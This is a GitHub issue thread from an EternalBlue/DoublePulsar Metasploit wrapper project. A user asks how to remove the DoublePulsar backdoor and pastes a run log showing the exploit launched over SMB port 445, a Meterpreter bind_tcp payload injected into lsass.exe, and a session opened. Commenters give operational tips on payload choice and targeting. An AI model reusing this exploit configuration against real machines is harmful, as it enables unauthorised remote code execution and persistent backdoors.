Eternalblue Double Pulsar - Remove Backdoor #80
Comments
|
I'm having the same issue... how do you resolve this? |
|
I'm also having the same issue.. |
|
So.... how to fix it? |
|
It this problem resolved ? |
|
reboot the target host. Since it resides in memory, just rebooting the machine should be enough to clear out your previous backdoor |
|
you all should know that this ruby script can not exploit an external target using its lan ip because the payload on target will connect to the ip configured on you lhost witch is the lan ip . |
|
And try to not using the bind_tcp payload |
Hi,
Can anyone please let me know how can I remove the backdoor that has been installed. I used eternal blue double pulsar exploit and payload windows/x64/meterpreter/bind_tcp.
Process inject - lsass.exe
Target Architecture - x64
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/
[] Started bind handler
[] x.x.x.x:445 - Generating Eternalblue XML data
[] x.x.x.x:445 - Generating Doublepulsar XML data
[] x.x.x.x:445 - Generating payload DLL for Doublepulsar
[] x.x.x.x:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[] x.x.x.x:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
[+] x.x.x.x:445 - Backdoor is already installed
[] x.x.x.x:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
[] Sending stage (206403 bytes) to 10.136.8.13
[*] Meterpreter session 2 opened (x.x.x.x:44911 -> x.x.x.x.13:4444) at 2018-07-13 12:35:02 -0400
0015:err:service:process_send_command receiving command result timed out
002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
[+] x.x.x.x:445 - Remote code executed... 3... 2... 1...
Thank you.
The text was updated successfully, but these errors were encountered: